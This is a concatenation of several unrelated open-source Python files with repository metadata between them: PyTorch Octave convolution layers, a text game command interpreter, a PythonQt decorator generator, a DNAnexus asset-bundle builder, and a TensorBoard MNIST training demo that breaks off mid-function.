self.weights = nn.Parameter(torch.Tensor(out_channels, in_channels, kernel_size[0], kernel_size[1]))
self.stride = stride
self.padding = padding
self.dilation = dilation
self.groups = groups
if bias:
self.bias = nn.Parameter(torch.Tensor(out_channels))
else:
self.bias = torch.zeros(out_channels).cuda()
self.up_kwargs = up_kwargs
self.h2g_pool = nn.AvgPool2d(kernel_size=(2,2), stride=2)
self.in_channels = in_channels
self.out_channels = out_channels
self.alpha_in = alpha_in
self.alpha_out = alpha_out
def forward(self, x):
X_h, X_l = x
if self.stride ==2:
X_h, X_l = self.h2g_pool(X_h), self.h2g_pool(X_l)
X_h2l = self.h2g_pool(X_h)
end_h_x = int(self.in_channels*(1- self.alpha_in))
end_h_y = int(self.out_channels*(1- self.alpha_out))
X_h2h = F.conv2d(X_h, self.weights[0:end_h_y, 0:end_h_x, :,:], self.bias[0:end_h_y], 1,
self.padding, self.dilation, self.groups)
X_l2l = F.conv2d(X_l, self.weights[end_h_y:, end_h_x:, :,:], self.bias[end_h_y:], 1,
self.padding, self.dilation, self.groups)
X_h2l = F.conv2d(X_h2l, self.weights[end_h_y:, 0: end_h_x, :,:], self.bias[end_h_y:], 1,
self.padding, self.dilation, self.groups)
X_l2h = F.conv2d(X_l, self.weights[0:end_h_y, end_h_x:, :,:], self.bias[0:end_h_y], 1,
self.padding, self.dilation, self.groups)
X_l2h = F.interpolate(X_l2h, scale_factor=2, **self.up_kwargs)
X_h = X_h2h + X_l2h
X_l = X_l2l + X_h2l
return X_h, X_l
class FirstOctaveConv(nn.Module):
def __init__(self, in_channels, out_channels,kernel_size, alpha_in=0.0, alpha_out=0.5, stride=1, padding=1, dilation=1,
groups=1, bias=False, up_kwargs = up_kwargs):
super(FirstOctaveConv, self).__init__()
self.weights = nn.Parameter(torch.Tensor(out_channels, in_channels, kernel_size[0], kernel_size[1]))
self.stride = stride
self.padding = padding
self.dilation = dilation
self.groups = groups
if bias:
self.bias = nn.Parameter(torch.Tensor(out_channels))
else:
self.bias = torch.zeros(out_channels).cuda()
self.up_kwargs = up_kwargs
self.h2g_pool = nn.AvgPool2d(kernel_size=(2,2), stride=2)
self.in_channels = in_channels
self.out_channels = out_channels
self.alpha_in = alpha_in
self.alpha_out = alpha_out
def forward(self, x):
if self.stride ==2:
x = self.h2g_pool(x)
X_h2l = self.h2g_pool(x)
X_h = x
end_h_x = int(self.in_channels*(1- self.alpha_in))
end_h_y = int(self.out_channels*(1- self.alpha_out))
X_h2h = F.conv2d(X_h, self.weights[0:end_h_y, 0: end_h_x, :,:], self.bias[0:end_h_y], 1,
self.padding, self.dilation, self.groups)
X_h2l = F.conv2d(X_h2l, self.weights[end_h_y:, 0: end_h_x, :,:], self.bias[end_h_y:], 1,
self.padding, self.dilation, self.groups)
X_h = X_h2h
X_l = X_h2l
return X_h, X_l
class LastOctaveConv(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, alpha_in=0.5, alpha_out=0.0, stride=1, padding=1, dilation=1,
groups=1, bias=False, up_kwargs = up_kwargs):
super(LastOctaveConv, self).__init__()
self.weights = nn.Parameter(torch.Tensor(out_channels, in_channels, kernel_size[0], kernel_size[1]))
self.stride = stride
self.padding = padding
self.dilation = dilation
self.groups = groups
if bias:
self.bias = nn.Parameter(torch.Tensor(out_channels))
else:
self.bias = torch.zeros(out_channels).cuda()
self.up_kwargs = up_kwargs
self.h2g_pool = nn.AvgPool2d(kernel_size=(2,2), stride=2)
self.in_channels = in_channels
self.out_channels = out_channels
self.alpha_in = alpha_in
self.alpha_out = alpha_out
def forward(self, x):
X_h, X_l = x
if self.stride ==2:
X_h, X_l = self.h2g_pool(X_h), self.h2g_pool(X_l)
end_h_x = int(self.in_channels*(1- self.alpha_in))
end_h_y = int(self.out_channels*(1- self.alpha_out))
X_h2h = F.conv2d(X_h, self.weights[0:end_h_y, 0:end_h_x, :,:], self.bias[:end_h_y], 1,
self.padding, self.dilation, self.groups)
X_l2h = F.conv2d(X_l, self.weights[0:end_h_y, end_h_x:, :,:], self.bias[:end_h_y], 1,
self.padding, self.dilation, self.groups)
X_l2h = F.interpolate(X_l2h, scale_factor=2, **self.up_kwargs)
X_h = X_h2h + X_l2h
return X_h
class OctaveCBR(nn.Module):
def __init__(self,in_channels, out_channels, kernel_size=(3,3),alpha_in=0.5, alpha_out=0.5, stride=1, padding=1, dilation=1,
groups=1, bias=False, up_kwargs = up_kwargs, norm_layer=nn.BatchNorm2d):
super(OctaveCBR, self).__init__()
self.conv = OctaveConv(in_channels,out_channels,kernel_size, alpha_in,alpha_out, stride, padding, dilation, groups, bias, up_kwargs)
self.bn_h = norm_layer(int(out_channels*(1-alpha_out)))
self.bn_l = norm_layer(int(out_channels*alpha_out))
self.relu = nn.ReLU(inplace=True)
def forward(self, x):
x_h, x_l = self.conv(x)
x_h = self.relu(self.bn_h(x_h))
x_l = self.relu(self.bn_l(x_l))
return x_h, x_l
class OctaveCB(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size=(3,3), alpha_in=0.5, alpha_out=0.5, stride=1, padding=1, dilation=1,
groups=1, bias=False, up_kwargs=up_kwargs, norm_layer=nn.BatchNorm2d):
super(OctaveCB, self).__init__()
self.conv = OctaveConv(in_channels, out_channels, kernel_size, alpha_in, alpha_out, stride, padding, dilation,
groups, bias, up_kwargs)
self.bn_h = norm_layer(int(out_channels * (1 - alpha_out)))
self.bn_l = norm_layer(int(out_channels * alpha_out))
def forward(self, x):
x_h, x_l = self.conv(x)
x_h = self.bn_h(x_h)
x_l = self.bn_l(x_l)
return x_h, x_l
class FirstOctaveCBR(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size=(3,3),alpha_in=0.0, alpha_out=0.5, stride=1, padding=1, dilation=1,
groups=1, bias=False, up_kwargs = up_kwargs, norm_layer=nn.BatchNorm2d):
super(FirstOctaveCBR, self).__init__()
self.conv = FirstOctaveConv(in_channels,out_channels,kernel_size, alpha_in,alpha_out,stride,padding,dilation,groups,bias,up_kwargs)
self.bn_h = norm_layer(int(out_channels * (1 - alpha_out)))
self.bn_l = norm_layer(int(out_channels * alpha_out))
self.relu = nn.ReLU(inplace=True)
def forward(self, x):
x_h, x_l = self.conv(x)
x_h = self.relu(self.bn_h(x_h))
x_l = self.relu(self.bn_l(x_l))
return x_h, x_l
class LastOCtaveCBR(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size=(3,3), alpha_in=0.5, alpha_out=0.0, stride=1, padding=1, dilation=1,
groups=1, bias=False, up_kwargs = up_kwargs, norm_layer=nn.BatchNorm2d):
super(LastOCtaveCBR, self).__init__()
self.conv = LastOctaveConv(in_channels, out_channels, kernel_size, alpha_in, alpha_out, stride, padding, dilation, groups, bias, up_kwargs)
self.bn_h = norm_layer(int(out_channels * (1 - alpha_out)))
self.relu = nn.ReLU(inplace=True)
def forward(self, x):
x_h = self.conv(x)
x_h = self.relu(self.bn_h(x_h))
return x_h
class FirstOctaveCB(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size=(3,3), alpha_in=0.0, alpha_out=0.5, stride=1, padding=1, dilation=1,
groups=1, bias=False, up_kwargs = up_kwargs, norm_layer=nn.BatchNorm2d):
super(FirstOctaveCB, self).__init__()
self.conv = FirstOctaveConv(in_channels,out_channels,kernel_size, alpha_in,alpha_out,stride,padding,dilation,groups,bias,up_kwargs)
self.bn_h = norm_layer(int(out_channels * (1 - alpha_out)))
self.bn_l = norm_layer(int(out_channels * alpha_out))
self.relu = nn.ReLU(inplace=True)
def forward(self, x):
x_h, x_l = self.conv(x)
x_h = self.bn_h(x_h)
x_l = self.bn_l(x_l)
return x_h, x_l
class LastOCtaveCB(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, alpha_in=0.5, alpha_out=0.0, stride=1, padding=1, dilation=1,
groups=1, bias=False, up_kwargs = up_kwargs, norm_layer=nn.BatchNorm2d):
super(LastOCtaveCB, self).__init__()
self.conv = LastOctaveConv( in_channels, out_channels, kernel_size, alpha_in, alpha_out, stride, padding, dilation, groups, bias, up_kwargs)
self.bn_h = norm_layer(int(out_channels * (1 - alpha_out)))
self.relu = nn.ReLU(inplace=True)
def forward(self, x):
x_h = self.conv(x)
x_h = self.bn_h(x_h)
return x_h
if __name__ == '__main__':
# nn.Conv2d
high = torch.Tensor(1, 64, 32, 32).cuda()
low = torch.Tensor(1, 192, 16, 16).cuda()
# test Oc conv
OCconv = OctaveConv(kernel_size=(3,3),in_channels=256,out_channels=512,bias=False,stride=2,alpha_in=0.75,alpha_out=0.75).cuda()
i = high,low
x_out,y_out = OCconv(i)
print(x_out.size())
print(y_out.size())
# test First Octave Cov
i = torch.Tensor(1, 3, 512, 512).cuda()
FOCconv = FirstOctaveConv(kernel_size=(3,3), in_channels=3, out_channels=128).cuda()
x_out, y_out = FOCconv(i)
# test last Octave Cov
LOCconv = LastOctaveConv(kernel_size=(3,3), in_channels=256, out_channels=128, alpha_out=0.75, alpha_in=0.75).cuda()
i = high, low
out = LOCconv(i)
print(out.size())
# test OCB
ocb = OctaveCB(in_channels=256, out_channels=128, alpha_out=0.75, alpha_in=0.75).cuda()
i = high, low
x_out_h, y_out_l = ocb(i)
print(x_out_h.size())
print(y_out_l.size())
ocb_last = LastOCtaveCBR(256,128, alpha_out=0.0, alpha_in=0.75).cuda()
i = high, low
x_out_h = ocb_last(i)
print(x_out_h.size())
| 39.781818 | 148 | 0.634186 |
199a68aef39dfbe1199c1a201f72939cf3134dfd
| 4,551 |
py
|
Python
|
Python-Game_Command_Interpreter/src/main.py
|
krzem5/Python-Fraction_Subtraction
|
f937b5a02f6425fb41bac9ddb882ca4a6999fd43
|
[
"BSD-3-Clause"
] | null | null | null |
Python-Game_Command_Interpreter/src/main.py
|
krzem5/Python-Fraction_Subtraction
|
f937b5a02f6425fb41bac9ddb882ca4a6999fd43
|
[
"BSD-3-Clause"
] | null | null | null |
Python-Game_Command_Interpreter/src/main.py
|
krzem5/Python-Fraction_Subtraction
|
f937b5a02f6425fb41bac9ddb882ca4a6999fd43
|
[
"BSD-3-Clause"
] | null | null | null |
sayings={'xp amout':'Your Experience Points:\t','coords':'%s:\tx=%s, y=%s, z=%s'}
errors={'short error':'Number must be smaller than 100001 and greater than -100001','integrer error':'%s must be an integer','no cmd':"Command %s does not exist",'len error':'Invalid length of %slist','invalid string':'String %sis invalid','bolean error':'%s is not true or false'}
help_={'xp':'/xp {add/delete} [amount]','help':'/help OR /help [cmd]','tp':'/tp [player] [x] [y] [z]','exit':'/exit','calculator':'/calculator','gamerule':'/gamerule [rule] [status]','effect':'/effect [effect] OR /effect [effect] [amplifier] [strenght]'}
commands=('xp','tp','help','exit','calculator','gamerule','effect')
gamerules={'chatOutput':True,'cheats':False,'characterLine':True}
# PLAYER INPUT (cmd)
# - if the input does not start with "/", the chat simply shows the input string
# - otherwise it is interpreted as one of the commands below:
#   /xp add/delete [short]        adds or deletes experience points
#   /tp [player] [x] [y] [z]      teleports the player to x, y, z
#   /help OR /help [cmd]          shows the help chat
#   /exit                         exits the program
#   /calculator                   opens the calculator
#   /gamerule [rule] [status]     changes gamerules
#   /effect [effect] OR /effect [effect] [amplifier] [strenght]
def interpret_command(cmd,user='krzem'):
output='\n'
global EXP
global coords
if cmd[1:3]=='xp':
if cmd[4:7]=='add':
exp_=cmd[8:]
if exp_.isnumeric():
if 100001>int(exp_)>-100001:
EXP+=int(exp_)
if EXP<0:
EXP=0
output+=sayings['xp amout']+str(EXP)
else:
output+=errors['short error']+'\n'
output+='Usage:\t'+help_['xp']
else:
output+=errors['integrer error']%('Number')+'\n'
output+='Usage:\t'+help_['xp']
elif cmd[4:10]=='delete':
exp_=cmd[11:]
if exp_.isnumeric():
exp_='-'+exp_
if 100001>int(exp_)>-100001:
EXP+=int(exp_)
if EXP<0:
EXP=0
output+=sayings['xp amout']+str(EXP)
else:
output+=errors['short error']+'\n'
output+='Usage:\t'+help_['xp']
else:
output+=errors['integrer error']%('Number')+'\n'
output+='Usage:\t'+help_['xp']
else:
output+=errors['invalid string']%('')+'\n'
output+='Usage:\t'+help_['xp']
elif cmd[1:3]=='tp':
list_tp=cmd[4:].split(' ')
cnt=1
exit_=False
if len(list_tp)==4:
for coord in list_tp:
if not cnt==1:
if not coord.isnumeric():
output+=errors['integrer error']%('Coord')+'\n'
output+='Usage:\t'+help_['tp']
exit_=True
break
cnt+=1
if not exit_:
coords[list_tp[0]]['x']=list_tp[1]
coords[list_tp[0]]['y']=list_tp[2]
coords[list_tp[0]]['z']=list_tp[3]
output+=sayings['coords']%('krzem',coords['krzem']['x'],coords['krzem']['y'],coords['krzem']['z'])
else:
output+=errors['len error']%("coordinater's ")+'\n'
output+='Usage:\t'+help_['tp']
elif cmd[1:5]=='help':
if len(cmd) > 6 and cmd[5] == ' ' and cmd[6:].isalpha():
if cmd[6:] in commands:
output+='Usage:\t'+help_[cmd[6:]]
else:
output+=errors['no cmd']%(cmd[6:])
else:
output+='Commands:'
for cmd_ in help_.keys():
output+='\n'+help_[cmd_]
elif cmd[1:5]=='exit':
exit()
elif cmd[1:]=='calculator':
import calculator
elif cmd[1:9]=='gamerule':
if cmd[10:20]=='chatOutput':
if cmd[21:]=='false':
gamerules['chatOutput']=False
elif cmd[21:]=='true':
gamerules['chatOutput']=True
else:
output+=errors['bolean error']%(cmd[21:])+'\n'
output+='Usage:\t'+help_['gamerule']
if cmd[10:16]=='cheats':
if cmd[17:]=='false':
gamerules['cheats']=False
elif cmd[17:]=='true':
gamerules['cheats']=True
else:
output+=errors['bolean error']%(cmd[21:])+'\n'
output+='Usage:\t'+help_['gamerule']
if cmd[10:23]=='characterLine':
if cmd[24:]=='false':
gamerules['characterLine']=False
elif cmd[24:]=='true':
gamerules['characterLine']=True
else:
output+=errors['bolean error']%(cmd[21:])+'\n'
output+='Usage:\t'+help_['gamerule']
elif cmd[1:7]=='effect':
if cmd[8:16]=='strenght':
output+='strenght'
if len(cmd) > 16 and cmd[16]==' ':
if cmd[17:20].isnumeric():
output+=' '+str(int(cmd[17:20]))
else:
output+=errors['integrer error']%('Number')+'\n'
output+='Usage:\t'+help_['effect']
else:
output+=errors['integrer error']%('Number')+'\n'
output+='Usage:\t'+help_['effect']
else:
output+='<%s> '%(user)
output+=cmd[0:]
return output
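# Added illustration (not in the original script) of the two basic paths through
# interpret_command():
#   interpret_command('/xp add 10')     -> reports the updated experience total
#   interpret_command('hello everyone') -> echoes the text as a chat line: '<krzem> hello everyone'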
coords={'krzem':{'x':1,'y':1,'z':1}}
EXP=100
for gamerule in gamerules.keys():
print(gamerule)
while True:
print(interpret_command(input('>>>')))
print()
| 28.803797 | 277 | 0.587343 |
f17c790d384bf44d1a800b5b075ced9cb5cd500f
| 6,586 |
py
|
Python
|
src/app/WrapPythonQt.py
|
edrumwri/director
|
c82aff0ed2ad0083dc5ac9cf4b90994d2d852be8
|
[
"BSD-3-Clause"
] | null | null | null |
src/app/WrapPythonQt.py
|
edrumwri/director
|
c82aff0ed2ad0083dc5ac9cf4b90994d2d852be8
|
[
"BSD-3-Clause"
] | null | null | null |
src/app/WrapPythonQt.py
|
edrumwri/director
|
c82aff0ed2ad0083dc5ac9cf4b90994d2d852be8
|
[
"BSD-3-Clause"
] | null | null | null |
import os
import re
import sys
import argparse
def wrap(args):
inFileNames = args.input_file
outFileName = args.output_file
exportSymbol = args.export_symbol
exportHeader = args.export_header
decoratorClassName = args.class_name
classNamePrefixes = args.class_prefixes
qtClassNamePrefixes = args.qt_class_prefixes
moduleName = args.module_name
autoClassIncludes = args.auto_class_includes
if not decoratorClassName:
if not outFileName.endswith('.h'):
raise Exception('Error: when output class name is not provided then the'
' output file extension must be .h')
decoratorClassName = os.path.basename(outFileName).replace('.h', '')
lines = []
for inFileName in inFileNames:
inFile = open(inFileName, 'r')
lines += inFile.read().splitlines()
inFile.close()
classNameRegexes = [re.compile('\\b%s[a-zA-Z0-9]*' % prefix) for prefix in classNamePrefixes]
qtClassNamePrefixes = tuple(qtClassNamePrefixes)
moduleName = moduleName or 'PythonQt'
exportInclude = '#include "%s"' % exportHeader if exportHeader else ''
generatedCode = str()
rePattern = re.compile(r'(?:(.+)\s+)?(\S+)::(\S+)\((.*)\).*')
includeClasses = set()
includeLines = list()
for line in lines:
if line.startswith("//"):
generatedCode += " " + line + "\n"
continue
elif line.startswith("#include"):
includeLines.append(line)
continue
elif not line.strip():
generatedCode += "\n"
continue
matchList = rePattern.findall(line)
if not matchList or len(matchList[0]) != 4:
raise Exception('Failed to match: "%s"' % line)
matchList = list(matchList[0])
return_type = matchList[0].strip()
class_name = matchList[1]
method_name = matchList[2]
args = matchList[3]
arg_list = args.split(",") if args.strip() else []
is_static = return_type.startswith("static ")
is_destructor = '~' == method_name[0]
is_constructor = not is_destructor and return_type == ''
if is_static:
return_type = return_type[7:]
decorator_method_name = "static_%s_%s" % (class_name, method_name)
elif is_destructor:
return_type = 'void'
decorator_method_name = "delete_%s" % class_name
elif is_constructor:
return_type = '%s*' % class_name
decorator_method_name = "new_%s" % class_name
else:
decorator_method_name = method_name
includeClasses.add(class_name)
for regex in classNameRegexes:
classname_matches = regex.findall(return_type)
for classname in classname_matches:
includeClasses.add(classname)
wrap_args = []
if not is_static and not is_constructor:
wrap_args.append("%s* inst" % class_name)
wrap_args_call = []
for i, arg_type in enumerate(arg_list):
arg_name = "arg%d" % i
wrap_args.append("%s %s" % (arg_type.strip(), arg_name))
wrap_args_call.append(arg_name)
callStatement = "%s(%s)" % (method_name, ", ".join(wrap_args_call))
if is_static:
callStatement = "%s::%s" % (class_name, callStatement)
elif is_destructor:
callStatement = 'delete inst'
elif is_constructor:
callStatement = 'new %s' % callStatement
else:
callStatement = "inst->%s" % callStatement
if return_type == 'void':
returnStatement = "%s;" % callStatement
else:
returnStatement = "return %s;" % callStatement
outStr = \
'''
%s %s(%s)
{
%s
}
'''
outStr = outStr % (return_type,
decorator_method_name,
", ".join(wrap_args),
returnStatement)
generatedCode += outStr
sortedClasses = list(includeClasses)
sortedClasses.sort()
if autoClassIncludes:
includeLines += ['#include "%s.h"' % className for className in sortedClasses]
classIncludes = "\n".join(includeLines)
classRegisters = "\n".join([' this->registerClassForPythonQt(&%s::staticMetaObject);' % className
for className in sortedClasses if className.startswith(qtClassNamePrefixes)])
outFile = open(outFileName, 'w')
outFile.write('''
#ifndef __%s_h
#define __%s_h
#include <QObject>
#include <PythonQt.h>
%s
%s
class %s %s : public QObject
{
Q_OBJECT
public:
%s(QObject* parent=0) : QObject(parent)
{
%s
}
inline void registerClassForPythonQt(const QMetaObject* metaobject)
{
PythonQt::self()->registerClass(metaobject, "%s");
}
public Q_SLOTS:
%s
};
#endif''' % (
decoratorClassName,
decoratorClassName,
exportInclude,
classIncludes,
exportSymbol,
decoratorClassName,
decoratorClassName,
classRegisters,
moduleName,
generatedCode))
outFile.close()
def main():
parser = argparse.ArgumentParser(description='Generate a PythonQt decorator class file from a list of method signatures.')
parser.add_argument('--input-file', '-i', nargs='+', required=True, help='A text file with method signatures, one per line.')
parser.add_argument('--output-file', '-o', required=True, help='The output filename. The file extension should be .h')
parser.add_argument('--module-name', default='', help='The Python module name under which Qt classes will be registered.')
parser.add_argument('--class-name', default='', help='The C++ class name of the generated decorator.'
' If empty, it will be computed from the output filename.')
parser.add_argument('--export-symbol', default='', help='An export symbol that will be added to the class declaration.')
parser.add_argument('--export-header', default='', help='A header filename that defines an export symbol.')
parser.add_argument('--class-prefixes', nargs='*', help='A list of class name prefixes.')
parser.add_argument('--qt-class-prefixes', nargs='*', help='A list of Qt class name prefixes.')
parser.add_argument('--auto-class-includes', action='store_true', help='Automatically generate include statements from class names.')
args = parser.parse_args()
wrap(args)
if __name__ == '__main__':
main()
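# Hedged example (added; the class name is hypothetical): each input line is a C++ method
# signature such as
#   ddExampleView* ddExampleView::view()
# which this script wraps into a PythonQt decorator slot roughly like
#   ddExampleView* view(ddExampleView* inst) { return inst->view(); }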
| 31.970874 | 137 | 0.612967 |
2554db36b64be932128fcc6c521238fadbce4837
| 8,631 |
py
|
Python
|
asset_builder_py3.py
|
dnanexus/dx_app_builder
|
16cca82af6fe41afb4a74828fafbc3992de359c7
|
[
"Apache-2.0"
] | null | null | null |
asset_builder_py3.py
|
dnanexus/dx_app_builder
|
16cca82af6fe41afb4a74828fafbc3992de359c7
|
[
"Apache-2.0"
] | 16 |
2016-04-22T16:54:07.000Z
|
2021-12-15T04:45:59.000Z
|
asset_builder_py3.py
|
dnanexus/dx_app_builder
|
16cca82af6fe41afb4a74828fafbc3992de359c7
|
[
"Apache-2.0"
] | 2 |
2017-06-16T08:58:06.000Z
|
2020-12-15T17:24:01.000Z
|
# Copyright (C) 2016 DNAnexus, Inc.
#
# This file is part of dx_asset_builder.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy
# of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
from os import path
import subprocess
from subprocess import PIPE
import tempfile
import random
import time
import json
import sys
import re
import lsb_release
import dxpy
from dxpy.utils.exec_utils import DXExecDependencyInstaller
def install_run_spec(exec_depends):
run_spec = {"runSpec": {"execDepends": exec_depends}}
job_desc = dxpy.get_handler(dxpy.JOB_ID).describe()
dx_installer = DXExecDependencyInstaller(run_spec, job_desc)
dx_installer.install()
def get_file_list(output_file, resources_to_ignore):
"""
This method finds all the files in the system and writes them to the output file.
"""
tmp_dir = path.dirname(output_file) + "*"
skipped_paths = ["/proc*", tmp_dir, "/run*", "/boot*", "/home/dnanexus*", "/sys*", "/var/lib/lxc*",
"/dev/ptmx", "/dev/pts/ptmx", "/dev/fuse", "/dev/net/tun"]
if lsb_release.get_os_release().get("CODENAME", "xenial") == "focal":
# Ubuntu 20.04 /bin and /sbin are symlinks to /usr/bin and /usr/sbin
skipped_paths.extend(["/bin", "/sbin", "/snap/*", "/dev/*"])
cmd = ["sudo", "find", "/"]
for ignore_dir in (skipped_paths + resources_to_ignore):
cmd.extend(["-not", "-path", ignore_dir])
env = os.environ.copy()
env['LC_ALL'] = 'C'
ps_pipe = subprocess.Popen(cmd, stdout=subprocess.PIPE)
ps_file = subprocess.Popen(["sort"], stdin=ps_pipe.stdout, stdout=PIPE, env=env)
with open(output_file, "w") as bfile:
for line in ps_file.stdout:
sp_code = ps_file.poll()
file_name = line.rstrip().decode()
if file_name == "":
if sp_code is not None:
break
else:
continue
if file_name == "/":
continue
try:
mtime = str(os.path.getmtime(file_name))
except OSError as os_err:
print(os_err)
mtime = ''
# file_name should not have special characters
# TODO escape the file name
bfile.write(file_name + "\t" + str(mtime) + '\n')
ps_file.stdout.close()
def get_file_diffs(first_file, second_file, diff_file):
""" Get difference between two txt files and write the difference to the
third file.
"""
cmd = ["sudo", "comm", "-13", first_file, second_file]
ps_pipe = subprocess.Popen(cmd, stdout=subprocess.PIPE)
with open(diff_file, "w") as bfile:
for line in ps_pipe.stdout:
line = line.rstrip().decode()
file_name = '\t'.join(line.split('\t')[:-1])
bfile.write(file_name + '\n')
ps_pipe.stdout.close()
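# Note (added for clarity): `comm -13 before after` suppresses the lines unique to the
# first file and the lines common to both, so only paths that are new or changed in
# `after` remain; the trailing mtime column is stripped before writing the diff file.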
def get_system_snapshot(output_file_path, ignore_files):
sys_tmp_dir = tempfile.gettempdir()
tmp_file_name = "file_" + str(random.randint(0, 1000000)) + "_" + str(int(time.time() * 1000)) + ".txt"
tmp_file_path = os.path.join(tempfile.gettempdir(), tmp_file_name)
get_file_list(tmp_file_path, ignore_files)
with open(output_file_path, 'w') as output_file_handle:
proc = subprocess.Popen(['sort', tmp_file_path], stdout=output_file_handle)
proc.communicate()
def build_asset(conf_json_fh, asset_makefile_fh, custom_asset_fh):
conf_json_fh = dxpy.DXFile(conf_json_fh)
if asset_makefile_fh is not None:
asset_makefile_fh = dxpy.DXFile(asset_makefile_fh)
if custom_asset_fh is not None:
custom_asset_fh = dxpy.DXFile(custom_asset_fh)
asset_conffile_path = "assetLib.json"
custom_assetfile_path = "asset-dl.tar.gz"
asset_makefile_path = "Makefile"
dxpy.download_dxfile(conf_json_fh, asset_conffile_path)
if asset_makefile_fh is not None:
dxpy.download_dxfile(asset_makefile_fh, asset_makefile_path)
if custom_asset_fh is not None:
dxpy.download_dxfile(custom_asset_fh, custom_assetfile_path)
with open(asset_conffile_path) as asset:
conf_data = json.load(asset)
# get list of directories in resources to ignore
ignore_dir = conf_data.get("excludeResource", [])
before_file_path_sort = tempfile.gettempdir() + '/before-sorted.txt'
print("Preparing the list of files in the system before installing any library.", file=sys.stderr)
get_system_snapshot(before_file_path_sort, ignore_dir)
if custom_asset_fh is not None:
print("Installing custom resources given by the user in the tarball.", file=sys.stderr)
subprocess.check_call(["sudo", "tar", "-xzf", custom_assetfile_path, '--no-same-owner', "-C", "/"])
if "execDepends" in conf_data:
print("Installing execDepends.", file=sys.stderr)
install_run_spec(conf_data['execDepends'])
# when running make, grab the output and err before raising error
if asset_makefile_fh is not None:
print("Running make.", file=sys.stderr)
mk_cmd = ["make", "-C", os.getcwd()]
process = subprocess.Popen(mk_cmd, stdout=subprocess.PIPE)
output, err = process.communicate()
retcode = process.poll()
if retcode:
cmd = mk_cmd
print(output, file=sys.stdout)
print(err, file=sys.stderr)
raise subprocess.CalledProcessError(retcode, cmd, output=output)
after_file_path_sort = tempfile.gettempdir() + '/after-sorted.txt'
print("Preparing the list of files in the system after installing user libraries.", file=sys.stderr)
get_system_snapshot(after_file_path_sort, ignore_dir)
diff_file_path = tempfile.gettempdir() + "/diff.txt"
print("Preparing the list of new and updated files after the installation.", file=sys.stderr)
get_file_diffs(before_file_path_sort, after_file_path_sort, diff_file_path)
# TODO: temporary fix for dx-unpack not tokenizing its command line
# correctly, resulting in being unable to extract filenames with whitespace
# in them
tar_output = re.sub(r"\s+", '-', conf_data["name"]) + ".tar.gz"
print("Creating the tarball '" + tar_output + "' of files listed in: " + diff_file_path, file=sys.stderr)
tar_cmd = ["tar", "-Pcz", "--no-recursion", "-T", diff_file_path, "-f", "-"]
tar_ps = subprocess.Popen(tar_cmd, stdout=subprocess.PIPE)
upload_ps = subprocess.Popen(["dx", "upload", "-", "--wait", "--brief", "-o", tar_output,
"--visibility", "hidden"],
stdin=tar_ps.stdout, stdout=subprocess.PIPE)
tar_ps.stdout.close()
asset_tarball_id = upload_ps.communicate()[0].rstrip().decode()
tar_ps.wait()
upload_ps.stdout.close()
# Create a record object referring to this hidden file
record_name = conf_data["name"]
record_details = {"archiveFileId": {"$dnanexus_link": asset_tarball_id}}
# Older clients do not provide the 'runSpecVersion' field in dxasset.json
if "runSpecVersion" in conf_data:
run_spec_version = str(conf_data["runSpecVersion"])
else:
run_spec_version = "0"
record_properties = {
"title": conf_data["title"],
"description": conf_data["description"],
"version": conf_data["version"],
"distribution": conf_data["distribution"],
"release": conf_data["release"],
"runSpecVersion": run_spec_version
}
asset_bundle = dxpy.new_dxrecord(name=record_name,
types=["AssetBundle"], details=record_details,
properties=record_properties, close=True)
# Add a property called {"AssetBundle": record-xxx} to the hidden tarball
asset_file = dxpy.DXFile(asset_tarball_id)
asset_file.set_properties({"AssetBundle": asset_bundle.get_id()})
print("\n'" + record_name + "' asset bundle created!\n", file=sys.stderr)
output = {}
output["asset_bundle"] = dxpy.dxlink(asset_bundle)
return output
| 41.296651 | 109 | 0.649056 |
56490d48aab4d78333b8e96c61b2b0c072c08bc1
| 3,423 |
py
|
Python
|
businesslayer/ai/deep-learning/tensorboard/scripts/TensorBoardGradientMnistDemo.py
|
dragomirdev/DataTachyonPlatform
|
733ce014b33942d1962b1d4c80aae47699e9ff15
|
[
"CC-BY-4.0",
"MIT"
] | null | null | null |
businesslayer/ai/deep-learning/tensorboard/scripts/TensorBoardGradientMnistDemo.py
|
dragomirdev/DataTachyonPlatform
|
733ce014b33942d1962b1d4c80aae47699e9ff15
|
[
"CC-BY-4.0",
"MIT"
] | null | null | null |
businesslayer/ai/deep-learning/tensorboard/scripts/TensorBoardGradientMnistDemo.py
|
dragomirdev/DataTachyonPlatform
|
733ce014b33942d1962b1d4c80aae47699e9ff15
|
[
"CC-BY-4.0",
"MIT"
] | null | null | null |
import tensorflow as tf
import datetime
# Clear any logs from previous runs
# !rm -rf ./logs/
# Load the MNIST dataset, normalize the data, and use a simple Keras model to classify the images into 10 classes.
mnist = tf.keras.datasets.mnist
(x_train, y_train),(x_test, y_test) = mnist.load_data()
x_train, x_test = x_train / 255.0, x_test / 255.0
def create_model():
return tf.keras.models.Sequential([
tf.keras.layers.Flatten(input_shape=(28, 28)),
tf.keras.layers.Dense(512, activation='relu'),
tf.keras.layers.Dropout(0.2),
tf.keras.layers.Dense(10, activation='softmax')
])
# Using TensorBoard with a custom training loop built on tf.GradientTape
train_dataset = tf.data.Dataset.from_tensor_slices((x_train, y_train))
test_dataset = tf.data.Dataset.from_tensor_slices((x_test, y_test))
train_dataset = train_dataset.shuffle(60000).batch(64)
test_dataset = test_dataset.batch(64)
loss_object = tf.keras.losses.SparseCategoricalCrossentropy()
optimizer = tf.keras.optimizers.Adam()
# Define our metrics
train_loss = tf.keras.metrics.Mean('train_loss', dtype=tf.float32)
train_accuracy = tf.keras.metrics.SparseCategoricalAccuracy('train_accuracy')
test_loss = tf.keras.metrics.Mean('test_loss', dtype=tf.float32)
test_accuracy = tf.keras.metrics.SparseCategoricalAccuracy('test_accuracy')
# Define the training and test functions:
def train_step(model, optimizer, x_train, y_train):
with tf.GradientTape() as tape:
predictions = model(x_train, training=True)
loss = loss_object(y_train, predictions)
